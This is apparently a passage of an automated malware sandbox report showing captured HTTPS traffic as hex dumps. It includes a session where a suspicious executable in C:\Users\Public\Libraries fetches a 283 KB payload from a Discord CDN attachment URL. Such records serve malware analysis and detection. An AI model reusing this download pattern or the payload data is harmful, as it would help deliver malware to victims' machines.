fc 45 bd 0c e2 e5 15 3b be e1 11 28 54 fb d2 fd d4 a2 1d 8b 94 5b 54 dc ba ea 8a 57 7b 02 a5 90 52 ea ae 68 c0 93 a7 a5 a6 06
                                                Data Ascii: 1G n=3>ZAl!"Jwd{mLn=3Z>ZY}<r`/{Hr`/<]iX|$-G0oZ0f$-hI{-m!N(JbJ%gX'bE;(T[TW{Rh
                                                2021-10-13 18:36:05 UTC641INData Raw: 24 dc 52 8b 94 33 f7 70 89 70 2c 86 b1 07 55 99 e5 93 58 30 f8 f2 c9 a2 62 c5 1f ab 62 b1 ae ef ec 43 e6 ae ef c8 1c 09 5b 20 15 c7 00 c1 9f 04 fc cc 3b 82 ab b6 2d e1 63 73 d7 88 56 ca 6d 3f d7 67 ed 84 fc 22 53 87 89 04 c3 66 b8 bb f8 e5 cb d0 52 4d 74 df a1 cb c5 1c 80 f9 9c 27 b4 9e 87 01 5b ab ec 8e 1b c7 55 2e 31 18 f0 07 56 94 d6 ed 7f 71 11 e4 e9 fd 85 6e 3e d1 e6 64 e0 b3 34 c9 ea a3 93 f8 d9 c4 46 5d e9 08 21 ae 97 4e 29 96 c6 64 3d 9f ca 40 5e 14 e7 9a e3 54 99 5e a5 61 35 2e 36 f4 00 2e 32 4a 7b 41 ec 89 87 a6 5f 5e 6f ae 72 ac 27 8f 42 40 a0 78 a2 c1 3f 36 47 f0 07 57 a8 81 4f f3 05 06 82 ad 76 22 4c 22 48 29 6b cc b1 5c a4 af ee 77 40 5b 1a fb a7 93 2d b5 72 d7 37 cd 08 26 de 73 cd db 92 ae 97 4e 7f d1 d4 05 da 05 da 09 68 30 b2 88 86 2c 23
                                                Data Ascii: $R3pp,UX0bbC[ ;-csVm?g"SfRMt'[U.1Vqn>d4F]!N)d=@^T^a5.6.2J{A_^or'B@x?6GWOv"L"H)k\w@[-r7&sNh0,#
                                                2021-10-13 18:36:05 UTC657INData Raw: a1 36 ab 01 a0 85 0e 18 00 2f 51 e0 1c 4c f1 c9 3d 55 ed 7f 9b 48 9b 79 e3 39 ba 7a 14 18 f8 f2 de e8 37 41 1d 74 39 da 3a 97 3a 71 dc b3 c4 62 d5 46 2e 54 d4 ab b4 b6 48 ab 6a 36 cc e6 bc 8a 7b 81 f7 cd 33 80 74 dc d3 83 dd bc 01 13 2d 42 21 1e fd e3 ee 42 da a0 4e f4 2b ed 8a 64 36 bd 8c d6 2a aa 18 cd 27 29 5c f6 9e 58 ea f0 72 e3 79 1d 0b 9a b8 40 bd 8c 50 b4 62 3b 27 f6 9e 55 66 9b 78 10 d3 a3 4d ca d8 c5 6a ff 9b ce 35 07 a0 00 f7 8c 9c c9 7c 7b 2f c5 17 08 e2 a2 a0 46 6e 8c 12 36 21 69 17 f6 5d dd 1c 82 fa 6d b4 33 fb 5e 58 66 cb ac 6c 31 fe 13 7a 98 3b a6 6e 8e 59 17 f4 76 1d de 50 81 97 f0 13 fa 79 94 64 3d 09 50 e0 e6 0e 26 21 95 ac 9c df df 61 cd b3 f4 10 ec 70 56 9b 3a aa de 1b 65 b8 5a 15 3e 68 d4 49 01 1d 00 0f e2 34 49 f3 6f 91 a2 4b fa e0
                                                Data Ascii: 6/QL=UHy9z7At9::qbF.THj6{3t-B!BN+d6*')\Xry@Pb;'UfxMj5|{/Fn6!i]m3^Xfl1z;nYvPyd=P&!apV:eZ>hI4IoK
                                                2021-10-13 18:36:05 UTC673INData Raw: 72 23 18 f7 c0 1a 08 31 38 8f 9e 65 3c dd 51 50 0f 4d fb 2a 0e d3 c8 57 9c e7 fa eb bf 92 73 09 98 68 9e 1e 50 8a d5 c5 dc 5c a2 f8 e5 93 53 f1 61 27 87 ce 3e 8e 90 df a1 37 b1 07 86 23 b7 ea 75 55 64 66 80 fd 82 ba 86 cf bc 86 59 18 f7 bc c6 29 a0 14 7e fc 00 91 29 57 e8 0a e0 08 1c 82 2b 86 df d5 7c 84 fc a1 ed bc 01 b7 01 b3 ff 43 e2 a0 cb 2a c0 10 3a da 1e 86 07 bd f3 71 ae 74 34 85 0e 2b 26 f7 9b b2 22 3c 83 0b 68 e4 ae e3 71 28 2a d2 3c 91 89 4a fc d1 17 8d 12 f5 ec f1 73 d9 9e 6a ea f4 9d 6f db 58 db 57 1f b4 22 9c fa 94 21 ed 0b 68 e4 ae e3 67 3d d8 42 e0 ef 84 0b 44 15 fb a9 f8 5e 2e cb d1 c2 f0 ef 41 69 99 86 e0 6b b5 72 2c eb f8 4f 54 d9 1c 09 1b 0b a3 96 70 89 49 7e 0a fe ab 39 cd c3 19 89 cf bc ae 6c 42 9b 45 16 04 27 87 8e 90 04 d3 c8 bf 64
                                                Data Ascii: r#18e<QPM*WshP\Sa'>7#uUdfY)~)W+|C*:qt4+&"<hq(*<JsjoXW"!hg=BD^.Aikr,OTpI~9lBE'd


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                3192.168.2.549760162.159.134.233443C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe
                                                TimestampkBytes transferredDirectionData
                                                2021-10-13 18:36:11 UTC678OUTGET /attachments/895935504124612633/897863238044242010/Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq HTTP/1.1
                                                User-Agent: aswe
                                                Host: cdn.discordapp.com
                                                Cache-Control: no-cache
                                                2021-10-13 18:36:11 UTC678INHTTP/1.1 200 OK
                                                Date: Wed, 13 Oct 2021 18:36:11 GMT
                                                Content-Type: application/octet-stream
                                                Content-Length: 283648
                                                Connection: close
                                                CF-Ray: 69daac0d3c06d6b9-FRA
                                                Accept-Ranges: bytes
                                                Age: 11441
                                                Cache-Control: public, max-age=31536000
                                                Content-Disposition: attachment;%20filename=Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq
                                                ETag: "0584cd5c8571b60faaa2811123ac81ce"
                                                Expires: Thu, 13 Oct 2022 18:36:11 GMT
                                                Last-Modified: Wed, 13 Oct 2021 15:07:57 GMT
                                                Vary: Accept-Encoding
                                                CF-Cache-Status: HIT
                                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                x-goog-generation: 1634137677483270
                                                x-goog-hash: crc32c=+JhllA==
                                                x-goog-hash: md5=BYTNXIVxtg+qooERI6yBzg==
                                                x-goog-metageneration: 1
                                                x-goog-storage-class: STANDARD
                                                x-goog-stored-content-encoding: identity
                                                x-goog-stored-content-length: 283648
                                                X-GUploader-UploadID: ADPycduGriJbFyWO3Ajj_7J6Zp42-vZFeJqDaEKSLbDXSCG_QR3-28T4UU8losd0PhRIFGKcDfjlfEiv-ZVdDLP8AEI
                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                2021-10-13 18:36:11 UTC679INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 64 50 51 4b 6e 4e 59 74 33 51 70 32 53 6f 77 33 76 6d 67 41 30 75 6b 44 75 66 76 61 6c 33 4c 56 53 25 32 42 56 66 4d 35 4f 56 66 69 25 32 46 79 56 69 47 77 58 25 32 42 6b 4e 59 71 48 45 57 34 74 53 36 70 36 51 45 56 47 53 75 4c 4e 33 65 62 52 38 63 74 58 37 61 6d 47 6d 55 4e 50 53 50 41 67 38 34 66 71 66 65 65 78 25 32 46 6b 54 30 41 31 70 31 69 37 6f 35 4a 70 31 6a 41 38 42 6a 59 25 32 42 25 32 42 41 54 4f 4a 6f 58 74 5a 76 78 54 77 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78
                                                Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dPQKnNYt3Qp2Sow3vmgA0ukDufval3LVS%2BVfM5OVfi%2FyViGwX%2BkNYqHEW4tS6p6QEVGSuLN3ebR8ctX7amGmUNPSPAg84fqfeex%2FkT0A1p1i7o5Jp1jA8BjY%2B%2BATOJoXtZvxTw%3D%3D"}],"group":"cf-nel","max
                                                2021-10-13 18:36:11 UTC679INData Raw: 19 c6 ec b4 32 7a aa 0e a0 08 90 64 f2 4d af b2 2a 6d 02 83 c4 d9 0e b7 b9 4c 35 81 38 0d 35 9d e7 36 09 12 b5 bd 4d af ad a8 13 37 8e 5a ce ed d8 8a 5f 63 77 20 53 5d 62 ff e2 a1 8d d8 9d e7 29 ef ca e2 a1 8d d8 9d f8 54 c6 e6 ab a0 16 a2 13 34 0c ab a5 96 6f 00 82 b0 24 58 dd 18 af b2 2a 6d 02 83 c4 d9 0e b7 b9 4c 35 81 38 0d 35 9d e7 36 09 12 b5 bd 4d af ad a8 13 37 8e 5a ce ed d8 8a 5f 63 77 20 53 5d 62 ff e2 a1 8d d8 9d e7 29 ef ca e2 a1 8d d8 9d f8 54 c6 e6 ab a0 16 a2 13 34 0c ab a5 96 6f 00 82 b0 24 58 dd 18 af b2 2a 6d 02 83 c4 d9 0e b7 b9 4c 35 81 38 0d 35 9d e7 36 09 12 b5 bd 4d af ad a8 13 37 8e 5a ce ed d8 8a 5f 63 77 20 53 5d 62 ff e2 a1 8d d8 9d e7 29 ef ca e2 a1 8d d8 9d f8 54 c6 e6 ab a0 16 a2 13 34 0c ab a5 96 6f 00 82 b0 24 58 dd 18 af
                                                Data Ascii: 2zdM*mL5856M7Z_cw S]b)T4o$X*mL5856M7Z_cw S]b)T4o$X*mL5856M7Z_cw S]b)T4o$X
                                                2021-10-13 18:36:11 UTC681INData Raw: 14 21 5b f6 dc 16 39 09 81 a8 9d 7f b5 21 5d f0 de 00 1a c2 40 9e 94 f2 c7 ea 32 fa de 07 88 db 8c d5 8d 50 47 30 e1 bd ce 78 30 e3 b3 3a 87 43 27 60 6b 9d 6b 80 39 0c 3a 99 60 75 84 dc 11 b6 ba 50 5d ee cc 7a 2f 77 b8 5e 71 8d 5a 55 db 95 6c 11 b0 af 27 75 85 51 c6 74 15 b9 c1 d1 e6 3b 14 35 07 8e d3 94 f0 dc 08 1f 48 b2 a7 0c 29 66 71 91 63 ef 5a 48 ab 22 dc 1e cc 70 0b be 4c b1 39 14 21 5b f6 dc 16 39 09 81 a8 9d 7f b5 21 5d f0 de 00 1a c2 40 9e 94 f2 c7 ea 32 fa de 07 88 db 8c d5 8d 50 47 30 e1 bd ce 78 30 e3 b3 3a 87 43 27 60 6b 9d 6b 80 39 0c 3a 99 60 75 84 dc 11 b6 ba 50 5d ee cc 7a 2f 77 b8 5e 71 8d 5a 55 db 95 6c 11 b0 af 27 75 85 51 c6 74 15 b9 c1 d1 e6 3b 14 35 07 8e d3 94 f0 dc 08 1f 48 b2 a7 0c 29 66 71 91 63 ef 5a 48 ab 22 dc 1e cc 70 0b be
                                                Data Ascii: ![9!]@2PG0x0:C'`kk9:`uP]z/w^qZUl'uQt;5H)fqcZH"pL9![9!]@2PG0x0:C'`kk9:`uP]z/w^qZUl'uQt;5H)fqcZH"p
                                                2021-10-13 18:36:11 UTC682INData Raw: 95 6c 11 b0 af 27 75 85 51 c6 74 15 b9 c1 d1 e6 3b 14 35 07 8e d3 94 f0 dc 08 1f 48 b2 a7 0c 29 66 71 91 63 ef 5a 48 ab 22 dc 1e cc 70 0b be 4c b1 39 14 21 5b f6 dc 16 39 09 81 a8 9d 7f b5 21 5d f0 de 00 1a c2 40 9e 94 f2 c7 ea 32 fa de 07 88 db 8c d5 8d 50 47 30 e1 bd ce 78 30 e3 b3 3a 87 43 27 60 6b 9d 6b 80 39 0c 3a 99 60 75 84 dc 11 b6 ba 50 5d ee cc 7a 2f 77 b8 5e 71 8d 5a 55 db 95 6c 11 b0 af 27 75 85 51 c6 74 15 b9 c1 d1 e6 3b 14 35 07 8e d3 94 f0 dc 08 1f 48 b2 a7 0c 29 66 71 91 63 ef 5a 48 ab 22 dc 1e cc 70 0b be 4c b1 39 14 21 5b f6 dc 16 39 09 81 a8 9d 7f b5 21 5d f0 de 00 1a c2 40 9e 94 f2 c7 ea 32 fa de 07 88 db 8c d5 8d 50 47 30 e1 bd ce 78 30 e3 b3 3a 87 43 27 60 6b 9d 6b 80 39 0c 3a 99 60 75 84 dc 11 b6 ba 50 5d ee cc 7a 2f 77 b8 5e 71 8d
                                                Data Ascii: l'uQt;5H)fqcZH"pL9![9!]@2PG0x0:C'`kk9:`uP]z/w^qZUl'uQt;5H)fqcZH"pL9![9!]@2PG0x0:C'`kk9:`uP]z/w^q
                                                2021-10-13 18:36:11 UTC683INData Raw: 07 88 db 8c d5 8d 50 47 30 e1 bd ce 78 30 e3 b3 3a 87 43 27 60 6b 9d 6b 80 39 0c 3a 99 60 75 84 dc 11 b6 ba 50 5d ee cc 7a 2f 77 b8 5e 71 8d 5a 55 db 95 6c 11 b0 af 27 75 85 51 c6 74 15 b9 c1 d1 e6 3b 14 35 07 8e d3 94 f0 dc 08 1f 48 b2 a7 0c 29 66 71 91 63 ef 5a 48 ab 22 dc 1e cc 70 0b be 4c b1 39 14 21 5b f6 dc 16 39 09 81 a8 9d 7f b5 21 5d f0 de 00 1a c2 40 9e 94 f2 c7 ea 32 fa de 07 88 db 8c d5 8d 50 47 30 e1 bd ce 78 30 e3 b3 3a 87 43 27 60 6b 9d 6b 80 39 0c 3a 99 60 75 84 dc 11 b6 ba 50 5d ee cc 7a 2f 77 b8 5e 71 8d 5a 55 db 95 6c 11 b0 af 27 75 85 51 c6 74 15 b9 c1 d1 e6 3b 14 35 07 8e d3 94 f0 dc 08 1f 48 b2 a7 0c 29 66 71 91 63 ef 5a 48 ab 22 dc 1e cc 70 0b be 4c b1 39 14 21 5b f6 dc 16 39 09 81 a8 9d 7f b5 21 5d f0 de 00 1a c2 40 9e 94 f2 c7 ea
                                                Data Ascii: PG0x0:C'`kk9:`uP]z/w^qZUl'uQt;5H)fqcZH"pL9![9!]@2PG0x0:C'`kk9:`uP]z/w^qZUl'uQt;5H)fqcZH"pL9![9!]@
                                                2021-10-13 18:36:11 UTC685INData Raw: a5 25 51 a6 b7 36 62 70 6d b2 a2 6c 2e f1 28 ce 79 4c 71 88 7d 5d 7e d8 ee c3 f3 af 67 5c 89 85 55 4b 79 a1 1d 53 70 70 8e 67 49 a5 af 0b 0d 4b 37 ef 24 4d 8f b6 b4 59 67 55 6e da 00 06 ac b1 93 5b e6 9f 77 b1 66 f7 e6 11 b9 24 ec 31 97 68 04 62 a1 46 f5 34 23 4f 5f 5e f9 09 88 fd 56 e0 cd 69 a7 87 f6 36 90 fe 56 95 6e fd 62 7f a1 00 62 bf 34 72 2f e8 7f a1 3e d7 9e b6 19 ca 8e cc 71 7c e7 ae 44 89 d4 62 74 a6 76 ba 26 59 de fe c2 cf 4d 8a 71 e3 95 70 7d 57 ca 8e 6d 83 72 ae e5 3b 8a 55 d8 19 59 66 4e dc ab 5c f3 f3 f0 6a ea 25 bb f1 d8 bd ae a7 fa 65 f1 f5 87 58 bf f4 d2 54 6f 7c 9c c6 ae bb ff 9a fd 26 cb 06 8f b3 5d e0 9d 93 71 73 3e d2 48 5c 5f f8 f6 30 e2 c3 0c 2b d3 10 25 5f ea 09 21 38 67 a1 94 59 98 e9 59 90 42 47 67 e1 40 b2 a4 47 d0 63 4e 10 be
                                                Data Ascii: %Q6bpml.(yLq}]~g\UKySppgIK7$MYgUn[wf$1hbF4#O_^Vi6Vnbb4r/>q|Dbtv&YMqp}Wmr;UYfN\j%eXTo|&]qs>H\_0+%_!8gYYBGg@GcN
                                                2021-10-13 18:36:11 UTC686INData Raw: 1d 28 87 f6 1a 20 61 ff 71 9f 1f f9 ff 6f 45 cd ca 76 23 53 61 6c 8d 31 ac 1b 60 7f ac b6 8d 93 b2 3f d7 30 d4 12 37 0b a1 8e 2c ca bb 26 cd f0 de 1b d4 f8 51 ba 86 76 1f 49 2a fd bf 29 e8 63 3b a9 3f 06 17 b1 b1 a8 13 91 bd 7d f4 d6 0e 3c 2b 27 2e 69 53 7f e1 bf cb f0 f5 8b 95 ed 92 4a f6 da 17 bd 1e 35 85 17 77 0b e2 21 54 56 6e 0f a7 bf 02 fa 86 db 9c fd e4 c1 60 0c ec 87 1b 5b e9 a2 d7 cb aa 2c 3e 23 bf cf fd 69 bd a3 67 a2 5c 8d bc 4c b6 b3 45 59 b1 60 a7 a2 64 69 97 7e 2c 70 b4 11 60 8e 74 1e cc 73 71 49 f4 35 d7 6e e9 ab 21 41 0a 7b ce 38 41 9b d5 9d 68 19 ef b5 ca 44 60 88 78 21 59 cc 07 38 18 f6 15 01 70 11 b5 2c e0 8e 77 bb 06 fb eb a5 0c 25 ea 77 ff cf 35 b1 d8 0c 22 ca 39 c0 93 e0 e2 94 13 b6 a2 94 c7 89 39 29 b5 8d aa 92 e5 ae dd 98 fc 84 0a
                                                Data Ascii: ( aqoEv#Sal1`?07,&QvI*)c;?}<+'.iSJ5w!TVn`[,>#ig\LEY`di~,p`tsqI5n!A{8AhD`x!Y8p,w%w5"99)
                                                2021-10-13 18:36:11 UTC687INData Raw: 4e 1c 58 cd 71 44 1b 1c d3 9b 64 06 b3 a4 0f 7b 02 4f ca 6e 0e 12 40 e6 0c e8 9b 24 de 1a dd 77 d1 86 95 bf 21 08 0c 2a ea 19 50 4a bf 1f ea 89 54 46 ba ee a1 6e e7 60 d5 6c 11 a4 9f 18 31 70 1b 91 8c 37 0a 17 b5 7b f0 82 59 10 99 c4 44 bc 45 82 04 3d 94 27 81 0f ad 27 60 46 68 db 1d 99 90 0b bb c7 f0 9d a9 cf 3e 57 6e bd d1 eb a2 2a 55 5c 1c 00 e1 28 e7 bd db 15 91 51 12 f1 f0 33 04 14 20 52 bb 29 18 fe 07 10 34 9c fa 5a b5 84 b8 82 8a 22 d0 7a 36 f3 e7 12 ef 86 79 2e f7 41 3d f0 9c bd 5f 37 be b9 c8 67 ff 03 2e 58 85 8c 6e fb 6a 10 34 e7 66 b5 85 8d b6 4f cb e1 a8 a8 f1 3f 42 7b 49 f2 c4 55 d2 f5 09 c7 77 60 82 e4 3d 17 aa 70 f0 26 e9 65 08 d2 7c 33 19 72 d6 ca 9e 57 6b 57 d5 92 ff be f2 74 ed 88 25 94 fc fd 64 ec b2 35 7d 63 15 6a 0a 0a 06 ed 0d f0 16
                                                Data Ascii: NXqDd{On@$w!*PJTFn`l1p7{YDE=''`Fh>Wn*U\(Q3 R)4Z"z6y.A=_7g.Xnj4fO?B{IUw`=p&e|3rWkWt%d5}cj
                                                2021-10-13 18:36:11 UTC689INData Raw: 77 ab 2f cb 0e 18 f1 ab 96 43 27 60 8b 3c a5 b3 e6 ca 84 53 cd e7 95 09 bb 23 94 50 cf 61 f8 c3 a5 ab 04 33 c9 0d 2a 40 93 70 ba 19 74 e6 ef fd e6 82 25 4b 80 ba 03 51 09 74 9e 10 32 f9 60 9e 6a 1d 89 fb ee 6e 0e 3a 20 a2 9b 7e f6 64 f4 78 3f 02 3f 57 b8 15 65 4c 47 af 2a e8 14 2c 87 ad ef fc 15 18 2b 75 7c 6c 9a 4b f2 23 86 69 8d 52 c5 77 ec 0e f8 3e 59 7a 23 59 85 80 6b 0f 6d 62 a7 8b 5b f7 ce 7a 9f 4e 92 15 77 0c 21 4c 9c 4e 79 0d 73 26 2d d5 92 ff 07 1a e4 17 75 77 6a 9a e1 a1 0b f0 64 f9 8d bf 0f 0a 0a 06 0d 65 06 7f 7f 00 da 80 2c e9 41 74 cf 46 72 fb cf 62 76 38 77 b9 b3 e2 e2 95 ff cc 6d 93 f0 25 04 65 38 35 9e 11 b1 2c 6b 09 40 d5 41 cc e0 87 48 b5 e5 fd 6c 07 5d 01 23 c2 40 85 69 35 07 37 d6 e9 1c 6f 9b 7f d0 42 6b 28 37 bd 6a 9b 7a 2a 5f 19 15
                                                Data Ascii: w/C'`<S#Pa3*@pt%KQt2`jn: ~dx??WeLG*,+u|lK#iRw>Yz#Ykmb[zNw!LNys&-uwjde,AtFrbv8wm%e85,k@AHl]#@i57oBk(7jz*_
                                                2021-10-13 18:36:11 UTC690INData Raw: 91 7b b2 e3 46 68 5c be fa 20 dc 17 bf 50 38 43 61 26 59 07 99 61 f7 af 2b 37 c3 12 de c0 5f e5 a7 65 0f 50 90 3f f9 93 6b 8f 5d 1f 1a c2 4a 73 74 ce 66 74 0b e8 09 63 6d 5f 1a 17 ba 46 b7 62 a1 66 d6 de a7 df 98 e7 ab 3d 41 73 4d f7 b0 6f 81 a5 10 8a c0 64 37 db 72 c2 52 5c 78 3d 90 61 43 ee 75 0d b8 55 d4 fa 2a 01 3c 4a 54 e5 b4 b1 36 bc 1e 62 e1 64 c6 f5 55 cf e8 73 3b 11 20 12 88 5a 41 3d 1b 43 e1 7d f6 12 df 32 f8 d8 0b 3f b6 a7 b7 f5 b7 99 67 e5 b6 1c 3d b8 87 96 0f 0f a0 8d 5c b0 da 4c 5e b6 0c 80 37 0a 1c 0d ac 57 7d 6d 6e 1e c4 4a bf 0a 4d b7 7c ed fb 61 eb a2 82 cb 16 b2 cd 3c 72 15 ab 3b 19 2f 22 a1 6f 45 cd ed 5e 65 f2 a4 7e c8 b5 ee 7a 32 ee d9 9a 36 a8 62 1c 03 37 00 17 bb c6 0a c1 6c 57 07 77 a7 17 a4 90 5f 27 d7 81 7f 09 82 24 c3 cd 0a ce
                                                Data Ascii: {Fh\ P8Ca&Ya+7_eP?k]Jstftcm_Fbf=AsMod7rR\x=aCuU*<JT6bdUs; ZA=C}2?g=\L^7W}mnJM|a<r;/"oE^e~z26b7lWw_'$
                                                2021-10-13 18:36:11 UTC691INData Raw: 6e 08 21 27 d9 bf 19 fb 81 a0 85 49 06 65 4a 03 9c f6 d5 84 fd da e2 20 d0 79 b1 cf c3 8f 49 2a 0e b0 16 e3 a0 29 cb ae a6 a4 bd 76 8d 73 54 03 85 48 b3 2c 53 75 33 10 37 1f 71 21 ec 30 d4 e2 4c 17 4c f0 ca 73 d5 93 72 03 93 81 0e 87 d4 19 4b 19 ab 9c f0 d7 95 7a 1c 53 7e 71 9b 7a 74 02 07 9b 6c b1 99 7b ba 4d 3f 30 1c 66 63 fc e4 28 d3 61 bc 1f 44 b6 f8 d6 eb 54 d5 8f 52 40 b4 55 6f 82 3f 05 92 c0 c3 f0 8b 43 38 32 3f 6a 2e 44 6d ab cc e9 87 80 12 9b 33 87 c5 99 5d 09 40 ae 11 0f 15 0c 27 de 1f bc 6a 14 18 0a 2b df 09 57 0e 26 5c fa c7 fb 63 ff b2 68 1c 9b 6d 85 45 28 f4 49 87 22 31 37 1e 23 4e 97 bb d0 c2 f8 db 80 22 dd 58 99 79 15 1d 54 59 c2 5b fe e3 40 ca 7f 0d e9 b3 86 d0 a1 d6 16 8f ca 68 06 0e 32 36 4d 35 ed d1 e8 2d 68 1f 43 3c 71 d5 95 83 00 1b
                                                Data Ascii: n!'IeJ yI*)vsTH,Su37q!0LLsrKzS~qztl{M?0fc(aDTR@Uo?C82?j.Dm3]@'j+W&\chmE(I"17#N"XyTY[@h26M5-hC<q
                                                2021-10-13 18:36:11 UTC693INData Raw: 59 83 c7 e2 ee 0a 09 eb 1d f7 09 3d de 1b 5e b0 b5 2b dc b9 d9 9b 74 0a 7a 19 cd f8 0f bf de 75 ab 31 cd 59 c3 c1 c9 ef f8 f0 73 8d ea ab 2a ee c3 c6 d8 48 4a b8 84 1b 57 18 f1 5f 86 c3 68 30 6e be e9 be 4f c0 54 f1 76 c9 e5 61 39 0e 5c 7c 8d 6c a4 2e c7 74 a1 48 b9 07 94 f0 23 c6 75 87 49 3e fd 34 63 e7 0b 7f d4 43 28 3d 14 33 b5 a3 0f ae b2 a6 76 6a 87 5e a0 95 7d 57 77 a3 15 b9 d7 36 a7 f8 dc dc c0 5f 3b d7 9b 17 6c e4 8d e7 10 33 02 07 80 87 15 37 10 ea f3 45 42 64 c6 2f e9 7b b0 b5 e3 bc 49 d4 99 6c 08 0c 39 e1 9e 62 79 15 1d 54 59 c3 d9 ea 1a 46 a2 37 9c 91 41 24 09 8d 5f 00 97 71 96 e9 ac 13 ff ea 36 50 9c f8 0c ec 2a 82 aa 7b 8a 4b 89 dd 92 e1 a2 97 cb cb 41 2d b6 7f be 20 46 14 05 98 2a f5 5f 5a f4 d8 0c 21 52 3f 42 54 43 ce 5f 4d 44 fe ef f3 1a
                                                Data Ascii: Y=^+tzu1Ys*HJW_h0nOTva9\|l.tH#uI>4cC(=3vj^}Ww6_;l37EBd/{Il9byTYF7A$_q6P*{KA- F*_Z!R?BTC_MD
                                                2021-10-13 18:36:11 UTC694INData Raw: 6c 23 e0 bc 60 a0 de 82 95 ba d7 57 24 ea 82 af cc d6 48 96 0b 92 e9 50 d0 66 90 4e 58 57 c1 63 f7 5b 96 d5 92 f3 f6 06 01 80 2c 54 28 f1 66 c7 66 b6 a9 17 b3 16 50 90 b9 b5 01 32 d7 63 46 65 f8 e2 3b 11 8e 6b d7 8b 93 0d 0d dd b1 03 b9 ef a5 a1 a4 41 56 e4 5c 19 3f 3b c2 25 ea d2 c3 c7 ee 59 a0 dc 06 02 57 d8 be 8d 1b aa 86 d6 ea 49 a0 b5 02 9f d9 c2 56 57 34 6d 8c 7b 75 b8 59 96 f1 ae 7c 65 16 22 d6 33 b7 1f bb e0 5e ff 91 38 95 74 a1 ce 21 ec fd 34 90 58 55 8f 18 e2 57 c5 d6 09 98 f4 32 eb f6 88 2f 99 79 d3 58 b8 88 80 33 bd ac d9 97 69 9b 68 4a b9 ad 46 79 e6 8b 6d bc 24 04 25 b6 2e d0 ad 90 a5 65 fd df 36 cb 74 ac d8 19 25 8c 3a 13 b2 ea 8b 52 53 2a cd 61 40 05 d0 9a 43 3f 17 e7 a5 a5 18 7d 6e e8 7e 22 3f f0 a4 9f 10 22 ed 67 65 c5 9f 11 ba a6 7f c4
                                                Data Ascii: l#`W$HPfNXWc[,T(ffP2cFe;kAV\?;%YWIVW4m{uY|e"3^8t!4XUW2/yX3ihJFym$%.e6t%:RS*a@C?}n~"?"ge
                                                2021-10-13 18:36:11 UTC695INData Raw: 9f 46 b2 2b a3 e7 ab 38 6b 58 51 ff 88 a4 3a b5 93 0a ae ae bf 85 4c e1 bc d8 13 51 c7 fc 00 c7 e7 88 75 7e a9 24 77 b9 70 13 a3 53 d3 c4 43 b9 81 0f bf ca 88 0b b6 95 d9 be d4 20 43 1e dd 8a cf 1b 92 f2 25 2b fd 49 68 02 20 46 37 23 4d 31 97 b4 a3 3e 25 4b 2e f3 4e 72 a4 02 2d a6 be 3f db bd 29 c5 f6 13 cd b8 cd c7 a4 ac 6f 63 92 75 88 2a d7 6a 30 11 06 fe 75 2c f7 4e 48 9b 51 a1 d3 d2 7a 26 e3 bf f6 60 d5 d0 e9 b1 36 a8 b6 00 aa df 3e 9f 04 ac 7b 87 5d e6 63 fb 60 6c 11 12 db cf e2 3e 8f 16 2c cb 25 e9 e6 36 92 e3 a7 8e 52 7f ad 3f 68 df df 8c d9 9a e3 83 ae 42 ed 44 b4 a9 24 fd 83 ef 02 0e 26 f8 7f 0f 98 ea 22 ad f6 84 c8 69 81 bb f0 71 2e b9 c7 fd 6f aa 4e 26 7b ab 39 0f bc 68 ed a6 d0 79 a8 87 ef 6e 2a e6 24 31 30 f1 f5 8f 87 4e 57 cd 89 81 08 f2 82
                                                Data Ascii: F+8kXQ:LQu~$wpSC C%+Ih F7#M1>%K.Nr-?)ocu*j0u,NHQz&`6>{]c`l>,%6R?hBD$&"iq.oN&{9hyn*$10NW
                                                2021-10-13 18:36:11 UTC697INData Raw: ac b5 30 f8 40 e7 84 d7 8c c7 6d 54 bf 3c 7c 2b 72 1e 52 b5 00 11 a5 59 d1 14 81 3d 28 52 b9 42 12 38 8d 70 ad ce 86 78 30 e3 0c 98 d8 0b a1 23 c7 e4 00 0d a5 ac 77 b4 97 cc 11 91 ad c4 b3 21 4e 4a 5d ef 40 9e ad d1 e5 b4 b5 32 c6 87 d0 50 95 5a 63 8b 8e fe 04 a3 36 4b ed 6d 32 1e e3 41 6a 14 15 17 66 b8 56 52 53 74 08 13 05 7f bd c8 66 4b 0d 08 bd 66 71 9d 9a 40 a7 29 6a 09 47 d7 fe 75 2a ed 41 21 b6 01 bc 6d 8c d4 35 e9 0d 23 d1 e3 a1 3c 75 17 17 51 c8 6d a4 08 b1 03 95 74 5a 55 39 b4 33 04 11 ac 81 86 69 42 94 f0 ce ce ba 66 93 b1 6f 8f 5f f2 d5 da 16 08 cf 4c e3 b9 d7 90 eb b5 33 04 97 da 2d 6b 9f b9 05 94 0c 9b 25 5f e8 39 bc e5 21 47 26 e8 1a 25 20 c7 56 b2 f5 4e 59 d3 99 da 29 57 d1 e4 6e 11 98 d4 24 4d 93 71 86 d6 e4 fe f7 52 e4 c8 47 28 f8 ec 00
                                                Data Ascii: 0@mT<|+rRY=(RB8px0#w!NJ]@2PZc6Km2AjfVRStfKfq@)jGu*A!m5#<uQmtZU93iBfo_L3-k%_9!G&% VNY)Wn$MqRG(
